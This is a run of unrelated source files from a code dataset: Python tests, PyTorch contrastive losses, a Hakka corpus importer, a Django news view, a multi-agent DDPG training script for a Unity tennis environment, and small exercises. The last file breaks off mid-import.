unexpected_value in [\n # Unexpected integer is specified as \"results\" parameter\n unexpected_int,\n # Unexpected integer is specified as \"results\" dictionary key\n {\"result_1\": \"some results\", unexpected_int: \"unexpected results\"},\n ]:\n with pytest.raises(ValueError):\n dataset.pre_pipeline(results=unexpected_value)\n\n @e2e_pytest_unit\n def test_otx_dataset_prepare_train_img_params_validation(self):\n \"\"\"\n Description:\n Check OTXSegDataset object \"prepare_train_img\" method input parameters validation\n\n Input data:\n OTXSegDataset object, \"idx\" non-integer type parameter\n\n Expected results:\n Test passes if ValueError exception is raised when unexpected type object is specified as\n input parameter for \"prepare_train_img\" method\n \"\"\"\n dataset = self.dataset()\n with pytest.raises(ValueError):\n dataset.prepare_train_img(idx=\"unexpected string\") # type: ignore\n\n @e2e_pytest_unit\n def test_otx_dataset_prepare_test_img_params_validation(self):\n \"\"\"\n Description:\n Check OTXSegDataset object \"prepare_test_img\" method input parameters validation\n\n Input data:\n OTXSegDataset object, \"idx\" non-integer type parameter\n\n Expected results:\n Test passes if ValueError exception is raised when unexpected type object is specified as\n input parameter for \"prepare_test_img\" method\n \"\"\"\n dataset = self.dataset()\n with pytest.raises(ValueError):\n dataset.prepare_test_img(idx=\"unexpected string\") # type: ignore\n\n @e2e_pytest_unit\n def test_otx_dataset_get_ann_info_params_validation(self):\n \"\"\"\n Description:\n Check OTXSegDataset object \"get_ann_info\" method input parameters validation\n\n Input data:\n OTXSegDataset object, \"idx\" non-integer type parameter\n\n Expected results:\n Test passes if ValueError exception is raised when unexpected type object is specified as\n input parameter for \"get_ann_info\" method\n \"\"\"\n dataset = self.dataset()\n with pytest.raises(ValueError):\n dataset.get_ann_info(idx=\"unexpected string\") # type: ignore\n\n @e2e_pytest_unit\n def test_otx_dataset_get_gt_seg_maps_params_validation(self):\n \"\"\"\n Description:\n Check OTXSegDataset object 
\"get_gt_seg_maps\" method input parameters validation\n\n Input data:\n OTXSegDataset object, \"efficient_test\" non-bool type parameter\n\n Expected results:\n Test passes if ValueError exception is raised when unexpected type object is specified as\n input parameter for \"get_gt_seg_maps\" method\n \"\"\"\n dataset = self.dataset()\n with pytest.raises(ValueError):\n dataset.get_gt_seg_maps(efficient_test=\"unexpected string\") # type: ignore\n\n\nclass TestMMDatasetFunctionsInputParamsValidation:\n @e2e_pytest_unit\n def test_get_annotation_mmseg_format_input_params_validation(self):\n \"\"\"\n Description:\n Check \"get_annotation_mmseg_format\" function input parameters validation\n\n Input data:\n \"get_annotation_mmseg_format\" function unexpected-type input parameters\n\n Expected results:\n Test passes if ValueError exception is raised when unexpected type object is specified as\n input parameter for \"get_annotation_mmseg_format\" function\n \"\"\"\n label = label_entity()\n correct_values_dict = {\n \"dataset_item\": dataset_item(),\n \"labels\": [label],\n }\n unexpected_int = 1\n unexpected_values = [\n # Unexpected integer is specified as \"dataset_item\" parameter\n (\"dataset_item\", unexpected_int),\n # Unexpected integer is specified as \"labels\" parameter\n (\"labels\", unexpected_int),\n # Unexpected integer is specified as nested label\n (\"labels\", [label, unexpected_int]),\n ]\n check_value_error_exception_raised(\n correct_parameters=correct_values_dict,\n unexpected_values=unexpected_values,\n class_or_function=get_annotation_mmseg_format,\n )\n","sub_path":"tests/unit/algorithms/segmentation/adapters/mmseg/test_dataset_params_validation.py","file_name":"test_dataset_params_validation.py","file_ext":"py","file_size_in_byte":9654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"481034163","text":"\"\"\"\nAuthor: Nasir Hayat (nasirhayat6160@gmail.com)\nDate: June 10, 2020\n\"\"\"\nfrom __future__ import print_function\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nfrom numpy import linalg as LA\n\n\nclass AttFeatsCon(nn.Module):\n def __init__(self):\n super(AttFeatsCon, self).__init__()\n self.att = np.load('/raid/mun/codes/zero_shot_detection/zsd_abl/MSCOCO/fasttext.npy')\n # self.att/=LA.norm(self.att, ord=2)\n\n device = (torch.device('cuda')\n if torch.cuda.is_available()\n else torch.device('cpu'))\n\n self.att = torch.from_numpy(self.att).to(device)\n self.temperature = 0.05\n\n def get_random_noise(self, bs, att_dim):\n \"\"\"\n returns normal initialized noise tensor \n \"\"\"\n z = torch.cuda.FloatTensor(bs, att_dim)\n z.normal_(0, 1)\n return z\n\n def forward(self, features, labels=None):\n device = (torch.device('cuda')\n if features.is_cuda\n else torch.device('cpu'))\n\n # import pdb; pdb.set_trace()\n\n # normalize features \n features = F.normalize(features, p=2, dim=1)\n\n att = self.att[labels]\n noise = self.get_random_noise(att.shape[0], att.shape[1])\n \n att = torch.cat((noise, att), 1)\n\n att = F.normalize(att, p=2, dim=1)\n\n\n labels = labels[:, None] # extend dim\n\n mask = torch.eq(labels, labels.t()).byte().to(device)\n\n eye = torch.eye(mask.shape[0], mask.shape[1]).byte().to(device)\n \n mask_pos = mask.masked_fill(eye, 0).float()\n\n mask_neg = (~mask).float()\n\n # mask_neg.masked_fill_(eye, 0)\n dot_prod_feats = torch.matmul(features, features.t())\n dot_prod_att = torch.matmul(att, att.t())\n \n\n # pos_pairs_mean = (mask_pos * 
dot_prod).sum() / (mask_pos.sum() + 1e-6)\n        # feats_neg_pairs = (mask_neg * dot_prod_feats).sum() / (mask_neg.sum() + 1e-6)\n        # att_neg_pairs_mean = (mask_neg * dot_prod_att).sum() / (mask_neg.sum() + 1e-6)\n\n        # loss = torch.abs((feats_neg_pairs_mean - att_neg_pairs_mean))\n        \n        # dist = (dot_prod_feats - dot_prod_att) * (dot_prod_feats - dot_prod_att)\n        # dist = torch.exp(dist / self.temperature)\n        \n        dist = torch.exp(torch.abs(dot_prod_feats - dot_prod_att) / self.temperature)\n        pos = torch.sum(dist * mask_pos) / (mask_pos.sum() + 1e-6)\n        neg = torch.sum(dist * mask_neg) / (mask_neg.sum() + 1e-6)\n\n        # loss = torch.sum(abs_dist*mask_neg) / (mask_neg.sum() + 1e-6)\n        # loss += torch.sum(abs_dist*mask_pos) / (mask_pos.sum() + 1e-6)\n\n        loss = (- torch.log(pos / (pos + neg) )).mean()\n\n        # loss = torch.sum(torch.abs(dot_prod_feats - dot_prod_att)*mask_neg) / (mask_neg.sum() + 1e-6)\n        # loss = torch.sum(torch.square(dot_prod_feats - dot_prod_att)*mask_neg) / (mask_neg.sum() + 1e-6)\n        # loss = 0.0 * (1.0 - pos_pairs_mean) + (1.0+ neg_pairs_mean)\n\n        return loss\n\n\n\n\nclass ConLossReal(nn.Module):\n    def __init__(self, features_mean):\n        super(ConLossReal, self).__init__()\n        self.device = (torch.device('cuda')\n          if torch.cuda.is_available()\n          else torch.device('cpu'))\n        self.seen_feats_mean = F.normalize(torch.from_numpy(features_mean), p=2, dim=1).float().to(self.device)\n\n    def forward(self, features, labels=None):\n        \n\n        # import pdb; pdb.set_trace()\n\n        # normalize features \n\n        features = F.normalize(features, p=2, dim=1)\n\n        dot_prod = torch.matmul(features, self.seen_feats_mean[labels].t())\n\n\n        labels = labels[:, None] # extend dim\n\n        mask = torch.eq(labels, labels.t()).bool().to(self.device)\n\n        eye = torch.eye(mask.shape[0], mask.shape[1]).bool().to(self.device)\n        \n        mask_pos = mask.masked_fill(eye, 0).float()\n\n        mask_neg = (~mask).float()\n        # mask_neg.masked_fill_(eye, 0)\n        \n\n        # q=mask_pos * dot_prod\n        # q[q>0.89]=1.0\n\n\n        pos_pairs_mean = (mask_pos * dot_prod).sum() / (mask_pos.sum() + 1e-6)\n        neg_pairs_mean = (mask_neg * dot_prod).sum() / (mask_neg.sum() + 1e-6)\n\n        loss = (1.0 - pos_pairs_mean) + (1.0+ neg_pairs_mean)\n\n        return loss\n\n\nclass SupConLoss(nn.Module):\n    def __init__(self):\n        super(SupConLoss, self).__init__()\n\n    def forward(self, features, labels=None):\n        device = (torch.device('cuda')\n          if features.is_cuda\n          else torch.device('cpu'))\n\n        # import pdb; pdb.set_trace()\n\n        # normalize features \n        features = F.normalize(features, p=2, dim=1)\n\n        labels = labels[:, None] # extend dim\n\n        mask = torch.eq(labels, labels.t()).bool().to(device)\n\n        eye = torch.eye(mask.shape[0], mask.shape[1]).bool().to(device)\n        \n        mask_pos = mask.masked_fill(eye, 0).float()\n\n        mask_neg = (~mask).float()\n        # mask_neg.masked_fill_(eye, 0)\n        dot_prod = torch.matmul(features, features.t())\n        \n\n        pos_pairs_mean = (mask_pos * dot_prod).sum() / (mask_pos.sum() + 1e-6)\n        neg_pairs_mean = (mask_neg * dot_prod).sum() / (mask_neg.sum() + 1e-6)\n\n        loss = (1.0 - pos_pairs_mean) + (1.0+ neg_pairs_mean)\n\n        return loss\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# class SupConLoss(nn.Module):\n#     \"\"\"Supervised Contrastive Learning: https://arxiv.org/pdf/2004.11362.pdf.\n#     It also supports the unsupervised contrastive loss in SimCLR\"\"\"\n#     def __init__(self, temperature=0.07, contrast_mode='all',\n#                  base_temperature=0.07):\n#         super(SupConLoss, self).__init__()\n#         self.temperature = temperature\n#         self.contrast_mode = contrast_mode\n#         self.base_temperature = 
base_temperature\n\n# def forward(self, features, labels=None, mask=None):\n# \"\"\"Compute loss for model. If both `labels` and `mask` are None,\n# it degenerates to SimCLR unsupervised loss:\n# https://arxiv.org/pdf/2002.05709.pdf\n\n# Args:\n# features: hidden vector of shape [bsz, n_views, ...].\n# labels: ground truth of shape [bsz].\n# mask: contrastive mask of shape [bsz, bsz], mask_{i,j}=1 if sample j\n# has the same class as sample i. Can be asymmetric.\n# Returns:\n# A loss scalar.\n# \"\"\"\n# device = (torch.device('cuda')\n# if features.is_cuda\n# else torch.device('cpu'))\n# features = F.normalize(features, p=2, dim=2)\n\n# if len(features.shape) < 3:\n# raise ValueError('`features` needs to be [bsz, n_views, ...],'\n# 'at least 3 dimensions are required')\n# if len(features.shape) > 3:\n# features = features.view(features.shape[0], features.shape[1], -1)\n\n# batch_size = features.shape[0]\n# if labels is not None and mask is not None:\n# raise ValueError('Cannot define both `labels` and `mask`')\n# elif labels is None and mask is None:\n# mask = torch.eye(batch_size, dtype=torch.float32).to(device)\n# elif labels is not None:\n# labels = labels.contiguous().view(-1, 1)\n# if labels.shape[0] != batch_size:\n# raise ValueError('Num of labels does not match num of features')\n# mask = torch.eq(labels, labels.t()).float().to(device)\n# else:\n# mask = mask.float().to(device)\n\n# import pdb; pdb.set_trace()\n\n# contrast_count = features.shape[1]\n# contrast_feature = torch.cat(torch.unbind(features, dim=1), dim=0)\n# if self.contrast_mode == 'one':\n# anchor_feature = features[:, 0]\n# anchor_count = 1\n# elif self.contrast_mode == 'all':\n# anchor_feature = contrast_feature\n# anchor_count = contrast_count\n# else:\n# raise ValueError('Unknown mode: {}'.format(self.contrast_mode))\n \n \n# # compute logits\n# anchor_dot_contrast = torch.div(\n# torch.matmul(anchor_feature, contrast_feature.t()),\n# self.temperature)\n# # for numerical stability\n# logits_max, _ = torch.max(anchor_dot_contrast, dim=1, keepdim=True)\n# logits = anchor_dot_contrast - logits_max.detach()\n\n# # tile mask\n# mask = mask.repeat(anchor_count, contrast_count)\n# # mask-out self-contrast cases\n# logits_mask = torch.ones_like(mask).scatter(\n# 1,\n# torch.arange(batch_size * anchor_count).view(-1, 1).to(device),\n# 0\n# )\n# mask = mask * logits_mask\n\n# # compute log_prob\n# exp_logits = torch.exp(logits) * logits_mask\n# log_prob = logits - torch.log(exp_logits.sum(1, keepdim=True))\n\n# # compute mean of log-likelihood over positive\n# mean_log_prob_pos = (mask * log_prob).sum(1) / mask.sum(1)\n\n# # loss\n# loss = - (self.temperature / self.base_temperature) * mean_log_prob_pos\n# loss = loss.view(anchor_count, batch_size).mean()\n\n# return loss\n\n\n\n\n\n\n\n","sub_path":"contrastive_loss.py","file_name":"contrastive_loss.py","file_ext":"py","file_size_in_byte":9220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"96199337","text":"# -*- coding: utf-8 -*-\n\"\"\"\n著作權所有 (C) 民國102年 意傳文化科技\n開發者:薛丞宏\n網址:http://意傳.台灣\n語料來源:請看各資料庫內說明\n\n本程式乃自由軟體,您必須遵照SocialCalc設計的通用公共授權(Common Public Attribution License, CPAL)來修改和重新發佈這一程式,詳情請參閱條文。授權大略如下,若有歧異,以授權原文為主:\n\t1.得使用、修改、複製並發佈此程式碼,且必須以通用公共授權發行;\n\t2.任何以程式碼衍生的執行檔或網路服務,必須公開該程式碼;\n\t3.將此程式的原始碼當函式庫引用入商業軟體,且不需公開非關此函式庫的任何程式碼\n\n此開放原始碼、共享軟體或說明文件之使用或散佈不負擔保責任,並拒絕負擔因使用上述軟體或說明文件所致任何及一切賠償責任或損害。\n\n臺灣言語工具緣起於本土文化推廣與傳承,非常歡迎各界用於商業軟體,但希望在使用之餘,能夠提供建議、錯誤回報或修補,回饋給這塊土地。\n\n感謝您的使用與推廣~~勞力!承蒙!\n\"\"\"\nfrom 臺灣言語工具.資料庫.資料庫連線 
import 資料庫連線\nfrom 臺灣言語工具.解析整理.拆文分析器 import 拆文分析器\nfrom 臺灣言語工具.解析整理.物件譀鏡 import 物件譀鏡\nfrom 臺灣言語工具.資料庫.欄位資訊 import 版本正常\nfrom 臺灣言語工具.資料庫.欄位資訊 import 字詞\nfrom 臺灣言語工具.資料庫.整合.整合入言語 import 加文字佮版本\nfrom 臺灣言語工具.資料庫.欄位資訊 import 客語\nfrom 臺灣言語工具.資料庫.欄位資訊 import 國語臺員腔\nfrom 臺灣言語工具.資料庫.整合.整合入言語 import 加關係\nfrom 臺灣言語工具.資料庫.欄位資訊 import 義近\nfrom 臺灣言語工具.資料庫.欄位資訊 import 會當替換\nfrom 臺灣言語工具.基本元素.公用變數 import 標點符號\nfrom 臺灣言語工具.音標系統.客話.臺灣客家話拼音 import 臺灣客家話拼音調類對照表\nfrom 臺灣言語工具.解析整理.文章粗胚 import 文章粗胚\nfrom 臺灣言語工具.解析整理.轉物件音家私 import 轉物件音家私\nfrom 臺灣言語工具.音標系統.客話.臺灣客家話拼音 import 臺灣客家話拼音\n\n客委會能力名 = '客委會能力認證'\n客委會能力地區 = '臺員'\n客委會能力年代 = 100\n\n# 揣全部資料 = 資料庫連線.prepare('SELECT \"編號\",\"客語詞\",\"腔\",\"音標\",\"國語詞\",\"英文詞\",\"客句\",\"國句\" FROM \"客語能力認證資訊區\".\"網頁資料\" WHERE \"編號\"= 107707 ORDER BY \"編號\"')\n揣全部資料 = 資料庫連線.prepare('SELECT \"編號\",\"客語詞\",\"腔\",\"音標\",\"國語詞\",\"英文詞\",\"客句\",\"國句\" FROM \"客語能力認證資訊區\".\"網頁資料\" ORDER BY \"編號\"')\n\nclass 整合客話能力():\n\tdef __init__(self):\n\t\t粗胚 = 文章粗胚()\n\t\t分析器 = 拆文分析器()\n\t\t全部資料 = 揣全部資料()\n\t\t家私 = 轉物件音家私()\n\t\t譀鏡 = 物件譀鏡()\n\n\t\tfor 編號, 客語詞, 腔, 音標, 國語詞, 英文詞, 客句, 國句 in 全部資料:\n\t\t\tprint(編號, 客語詞, 腔, 音標)\n\t\t\t腔 = 客語 + 腔 + '腔'\n\t\t\t種類 = 字詞\n\t\t\t流水號集 = []\n\t\t\tfor 標點 in 標點符號:\n\t\t\t\t國語詞 = 國語詞.replace(標點, ' ')\n\t\t\tfor 數字 in range(10):\n\t\t\t\t國語詞 = 國語詞.replace(str(數字), ' ')\n\t\t\tfor 詞 in 國語詞.split():\n\t\t\t\tprint(詞)\n\t\t\t\t流水號 = 加文字佮版本(客委會能力名, 種類, 國語臺員腔, 客委會能力地區,\n\t\t\t\t\t客委會能力年代, 詞, '', 版本正常)\n\t\t\t\t流水號集.append(流水號)\n\n\t\t\tfor 調 in 臺灣客家話拼音調類對照表 - {''}:\n\t\t\t\t音標 = 音標.replace(調, 調 + ' ')\n\t\t\t音標 = 音標.replace('】', ' ')\n\t\t\tfor 逐个音 in 音標.split('【'):\n\t\t\t\ttry:\n\t\t\t\t\t客語詞 = 客語詞.replace('(', ' ( ').replace(')', ')').replace('(', ' ( ')\n\t\t\t\t\t逐个音 = 逐个音.replace('(', ' ( ').replace(')', ')').replace('(', ' ( ')\n\t\t\t\t\tprint(客語詞, 逐个音)\n\t\t\t\t\t句物件 = 分析器.產生對齊組(客語詞, 逐个音)\n\t\t\t\t\t新客語詞 = 客語詞.replace(')', ' ')\n\t\t\t\t\t新音標 = 逐个音.replace(')', ' ')\n\t\t\t\t\tif '(' in 新客語詞 and '(' in 新音標:\n\t\t\t\t\t\t詞集 = 新客語詞.split('(')\n\t\t\t\t\t\t音集 = 新音標.split('(')\n\t\t\t\t\telse:\n\t\t\t\t\t\t詞集 = [新客語詞]\n\t\t\t\t\t\t音集 = [新音標]\n\t\t\t\t\tfor 詞, 音 in zip(詞集, 音集):\n\t\t\t\t\t\t音 = 粗胚.除掉重覆的空白(音).strip()\n\t\t\t\t\t\tprint(詞, 音)\n\t\t\t\t\t\t音 = 音.replace(' ', '-')\n\t\t\t\t\t\t新句物件 = 分析器.產生對齊組(詞, 音)\n\t\t\t\t\t\t標準句物件 = 家私.轉做標準音標(臺灣客家話拼音, 新句物件)\n\t\t\t\t\t\tprint(客委會能力名, 種類, 腔, 客委會能力地區,\n \t\t\t\t\t\t\t\t\t客委會能力年代, 譀鏡.看型(標準句物件), 譀鏡.看音(標準句物件), 版本正常)\n\t\t\t\t\t\t流水號 = 加文字佮版本(客委會能力名, 種類, 腔, 客委會能力地區,\n \t\t\t\t\t\t\t\t\t客委會能力年代, 譀鏡.看型(標準句物件), 譀鏡.看音(標準句物件), 版本正常)\n\t\t\t\t\t\tfor 進前流水號 in 流水號集:\n\t\t\t\t\t\t\t加關係(進前流水號, 流水號, 義近, 會當替換)\n\t\t\t\t\t\t\t加關係(流水號, 進前流水號, 義近, 會當替換)\n\t\t\t\t\t\t流水號集.append(流水號)\n\t\t\t\texcept Exception as 錯誤:\n\t\t\t\t\tprint('錯誤!! 
{0},{1},{2},{3},{4}'.\n\t\t\t\t\t\tformat(編號, 客語詞, 音標, type(錯誤), 錯誤))\n\n\n\n\nif __name__ == '__main__':\n\t整合客話能力()\n","sub_path":"舊臺灣言語工具/資料佮語料匯入整合/客語能力認證資訊區/整合客語能力.py","file_name":"整合客語能力.py","file_ext":"py","file_size_in_byte":5534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"626839711","text":"def payup(set, n, sum):\n if sum == 0:\n return True\n if n == 0 and sum != 0:\n return False\n\n if set[n-1] > sum:\n return payup(set, n-1, sum)\n\n return payup(set, n-1, sum) or payup(set, n-1, sum-set[n-1])\n\n\nfor t in range(int(input())):\n n, m = map(int, input().split())\n notes = []\n for i in range(n):\n notes.append(int(input()))\n if(payup(notes, n, m)):\n print(\"Yes\")\n else:\n print(\"No\")\n","sub_path":"data/CodeChef/MARCHA1.py","file_name":"MARCHA1.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"563817708","text":"from django.shortcuts import render\nfrom .models import Tweet, Reddit, Iconist, Medium, YouTube, Rhizome, ICYMI\nimport datetime\nfrom datetime import timedelta\n\n#from news.cron import news_cron_15m, news_cron_6h\n\nfrom itertools import chain\nfrom operator import attrgetter\n\n\ndef init_mode(request):\n if 'nightmode' not in request.session:\n request.session['nightmode'] = True\n if 'navbar' not in request.session:\n request.session['navbar'] = True\n if 'fromAddress' not in request.session:\n request.session['fromAddress'] = 'none'\n\n context = {\n 'nightmode': request.session['nightmode'],\n 'navbar': request.session['navbar'],\n 'fromAddress': request.session['fromAddress'],\n 'section': 'NEWS',\n }\n return context\n\n\ndef news(request, template='news/news.html', extra_context=None):\n context = init_mode(request)\n\n today = datetime.datetime.now()\n long_ago = today + timedelta(days=-30)\n\n #news_cron_15m()\n #news_cron_6h()\n #latest_tweets()\n #latest_reddits()\n #latest_iconists()\n #latest_mediums()\n #latest_youtubes()\n #latest_rhizomes()\n\n icymi_entries = ICYMI.objects.filter(create_day__gte=long_ago).order_by('-create_day') #ICYMI.objects.all().order_by('-create_day')[:5]\n twitter_entries = Tweet.objects.all()\n reddit_entries = Reddit.objects.all()\n youtube_entries = YouTube.objects.filter(created_at__gte=long_ago)\n medium_entries = Medium.objects.filter(created_at__gte=long_ago)\n iconist_entries = Iconist.objects.filter(created_at__gte=long_ago)\n rhizome_entries = Rhizome.objects.filter(created_at__gte=long_ago)\n\n all_entries = list(chain(twitter_entries, reddit_entries, medium_entries, iconist_entries, rhizome_entries))\n all_entries = sorted(all_entries, key=attrgetter('created_at'), reverse=True)\n\n context.update({\n 'subsection': 'NEWS',\n 'icymi_entries': icymi_entries,\n 'all_entries': all_entries,\n 'twitter_entries': twitter_entries,\n 'reddit_entries': reddit_entries,\n 'youtube_entries': youtube_entries,\n 'medium_entries': medium_entries,\n 'iconist_entries': iconist_entries,\n 'rhizome_entries': rhizome_entries,\n })\n\n if extra_context is not None:\n context.update(extra_context)\n return render(request, template, context)\n\n","sub_path":"news/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"271761414","text":"\nfrom unityagents import UnityEnvironment\nimport numpy as np\nfrom agent import 
MultiAgentDeepDeterministicPolicyGradient\nimport torch\n\n\nimport time\nfrom collections import deque\nimport numpy as np\nfrom tensorboardX import SummaryWriter\n\n\n# Reference/Credit Stats class & reporting mechanisms: danielnbarbosa/drlnd_collaboration_and_competition \nclass Stats():\n def __init__(self):\n self.score = None\n self.avg_score = None\n self.std_dev = None\n self.scores = [] # list containing scores from each episode\n self.avg_scores = [] # list containing average scores after each episode\n self.scores_window = deque(maxlen=100) # last 100 scores\n self.best_avg_score = -np.Inf # best score for a single episode\n self.time_start = time.time() # track cumulative wall time\n self.total_steps = 0 # track cumulative steps taken\n self.writer = SummaryWriter()\n\n def update(self, steps, rewards, i_episode):\n \"\"\"Update stats after each episode.\"\"\"\n self.total_steps += steps\n self.score = sum(rewards)\n self.scores_window.append(self.score)\n self.scores.append(self.score)\n self.avg_score = np.mean(self.scores_window)\n self.avg_scores.append(self.avg_score)\n self.std_dev = np.std(self.scores_window)\n # update best average score\n if self.avg_score > self.best_avg_score and i_episode > 100:\n self.best_avg_score = self.avg_score\n\n def is_solved(self, i_episode, solve_score):\n \"\"\"Define solve criteria.\"\"\"\n return self.avg_score >= solve_score and i_episode >= 100\n\n def print_episode(self, i_episode, steps, stats_format, buffer_len, noise_weight,\n critic_loss_01, critic_loss_02,\n actor_loss_01, actor_loss_02,\n noise_val_01, noise_val_02,\n rewards_01, rewards_02):\n common_stats = 'Episode: {:5} Avg: {:8.3f} BestAvg: {:8.3f} σ: {:8.3f} | Steps: {:8} Reward: {:8.3f} | '.format(i_episode, self.avg_score, self.best_avg_score, self.std_dev, steps, self.score)\n print('\\r' + common_stats + stats_format.format(buffer_len, noise_weight), end=\"\")\n # log lots of stuff to tensorboard\n self.writer.add_scalar('global/reward', self.score, i_episode)\n self.writer.add_scalar('global/std_dev', self.std_dev, i_episode)\n self.writer.add_scalar('global/avg_reward', self.avg_score, i_episode)\n self.writer.add_scalar('global/buffer_len', buffer_len, i_episode)\n self.writer.add_scalar('global/noise_weight', noise_weight, i_episode)\n self.writer.add_scalar('agent_01/critic_loss', critic_loss_01, i_episode)\n self.writer.add_scalar('agent_02/critic_loss', critic_loss_02, i_episode)\n self.writer.add_scalar('agent_01/actor_loss', actor_loss_01, i_episode)\n self.writer.add_scalar('agent_02/actor_loss', actor_loss_02, i_episode)\n self.writer.add_scalar('agent_01/noise_val_01', noise_val_01[0], i_episode)\n self.writer.add_scalar('agent_01/noise_val_02', noise_val_01[1], i_episode)\n self.writer.add_scalar('agent_02/noise_val_01', noise_val_02[0], i_episode)\n self.writer.add_scalar('agent_02/noise_val_02', noise_val_02[1], i_episode)\n self.writer.add_scalar('agent_01/reward', rewards_01, i_episode)\n self.writer.add_scalar('agent_02/reward', rewards_02, i_episode)\n\n def print_epoch(self, i_episode, stats_format, *args):\n n_secs = int(time.time() - self.time_start)\n common_stats = 'Episode: {:5} Avg: {:8.3f} BestAvg: {:8.3f} σ: {:8.3f} | Steps: {:8} Secs: {:6} | '.format(i_episode, self.avg_score, self.best_avg_score, self.std_dev, self.total_steps, n_secs)\n print('\\r' + common_stats + stats_format.format(*args))\n\n def print_solve(self, i_episode, stats_format, *args):\n self.print_epoch(i_episode, stats_format, *args)\n print('\\nSolved in {:d} 
episodes!'.format(i_episode-100))\n\nclass general_environment_solver():\n \"\"\" General Solver for Unity Environments \"\"\"\n def __init__(self, unity_env='Tennis_Linux/Tennis.x86_64'):\n \n \"\"\"Initialize a general environment solver. Run refresh_env to reset the solver.\n You can run the solver using the defaults.\n \n Params\n ======\n unity_env (string): path to unity environment\n \"\"\"\n self.env = UnityEnvironment(file_name=unity_env)\n self.train_mode = True\n \n def ready_agents(self, display_info=True, train_mode=True):\n # get the default brain\n self.brain_name = self.env.brain_names[0]\n brain = self.env.brains[self.brain_name]\n \n if display_info==True:\n print(\"Brain name \" + self.brain_name)\n \n # refresh the environment\n self.env_info = self.env.reset(train_mode=self.train_mode)[self.brain_name]\n \n self.agent = MultiAgentDeepDeterministicPolicyGradient()\n \n def run_maddpg(self, n_episodes=10000000, max_timesteps=1000, min_solve_threshold=0.50, scores_window_length=100):\n # train the agent\n\n \"\"\" MultiAgent Deep Deterministic Policy Gradients\n \n Params\n ======\n num_episodes (int): maximum number of training episodes\n max_t (int): maximum number of timesteps per episode\n min_solve_threshold (float): a score metric that result in training to stop\n scores_window_length (int): maximum length of scoring metric window, e.g. last 100 scores\n \"\"\"\n \n # list containing scores from each episode\n stats = Stats()\n stats_format = 'Buffer: {:6} NoiseW: {:.4}'\n\n for i_episode in range(1, n_episodes+1):\n rewards = []\n env_info = self.env.reset(train_mode=self.train_mode)[self.brain_name]\n state = env_info.vector_observations\n\n # loop over steps\n for t in range(max_timesteps):\n # select an action\n if self.agent.evaluation_only: # disable noise on evaluation\n action = self.agent.act(state, add_noise=False)\n else:\n action = self.agent.act(state)\n\n # take action in environment\n self.env_info = self.env.step(action)[self.brain_name]\n next_state = self.env_info.vector_observations\n reward = self.env_info.rewards\n done = self.env_info.local_done\n\n # update agent with returned information\n self.agent.step(state, action, reward, next_state, done)\n state = next_state\n rewards.append(reward)\n if any(done):\n break\n\n # every episode\n buffer_len = len(self.agent.memory)\n per_agent_rewards = [] # calculate per agent rewards\n for i in range(self.agent.num_agents):\n per_agent_reward = 0\n for step in rewards:\n per_agent_reward += step[i]\n per_agent_rewards.append(per_agent_reward)\n stats.update(t, [np.max(per_agent_rewards)], i_episode) # use max over all agents as episode reward\n stats.print_episode(i_episode, t, stats_format, buffer_len, self.agent.noise_weight,\n self.agent.agents[0].critic_loss, self.agent.agents[1].critic_loss,\n self.agent.agents[0].actor_loss, self.agent.agents[1].actor_loss,\n self.agent.agents[0].noise_val, self.agent.agents[1].noise_val,\n per_agent_rewards[0], per_agent_rewards[1])\n\n # every epoch (100 episodes)\n if i_episode % 100 == 0:\n #stats.print_epoch(i_episode, stats_format, buffer_len, agent.noise_weight)\n save_name = 'saves/episode.{}.'.format(i_episode)\n for i, save_agent in enumerate(self.agent.agents):\n torch.save(save_agent.actor_local.state_dict(), save_name + str(i) + '.actor.pth')\n torch.save(save_agent.critic_local.state_dict(), save_name + str(i) + '.critic.pth')\n\n # if solved\n if stats.is_solved(i_episode, min_solve_threshold):\n stats.print_solve(i_episode, stats_format, 
buffer_len, self.agent.noise_weight)\n save_name = 'saves/solved.'\n for i, save_agent in enumerate(self.agent.agents):\n torch.save(save_agent.actor_local.state_dict(), save_name + str(i) + '.actor.pth')\n torch.save(save_agent.critic_local.state_dict(), save_name + str(i) + '.critic.pth')\n break\n\n\n","sub_path":"p3_collab-compet/GES.py","file_name":"GES.py","file_ext":"py","file_size_in_byte":8915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"56855546","text":"def bad_func(a, b=[]):\n b.append(a)\n return b\n# \n# ## Как правильно работать со списком в\n# ## качестве аргумента функции\ndef good_func(a, b=None):\n if b is None:\n b = []\n b.append(a)\n return b\n# \nlst = [4, 5, 8]\nres_1 = bad_func(111, lst)\nprint(res_1)\nres_2 = bad_func(222, res_1)\nprint(res_2)\n\nres_3 = bad_func(333)\nprint(res_3)\n\n# res_4 = bad_func(444, ['hello', 'hi'])\n# print(res_4)\n\nprint('Неправильная работа функции')\nres_5 = bad_func(555)\nprint(f'{res_5}')\nres_6 = bad_func(666)\nprint(f'{res_6}')\n# \nprint('Правильная работа функции')\ngood_res_3 = good_func(333)\nprint(good_res_3)\ngood_res_4 = good_func(444)\nprint(good_res_4)\ngood_res_5 = good_func(555)\nprint(good_res_5)\n# \ngood_res_6 = good_func(111, lst)\nprint(good_res_6)\n\n\n\n","sub_path":"Python 1/Day 8/Examples/funcs_and_list.py","file_name":"funcs_and_list.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"112063106","text":"from tqdm import tqdm\nimport argparse\nfrom datetime import datetime\n\n# for debugging\nimport code\n\n\nimport os\nimport sys\nimport time\nimport scipy.misc\nfrom scipy import sparse\nimport cv2\nfrom PIL import Image\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\"\n\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom utils import *\nfrom LIP_model import *\nimport 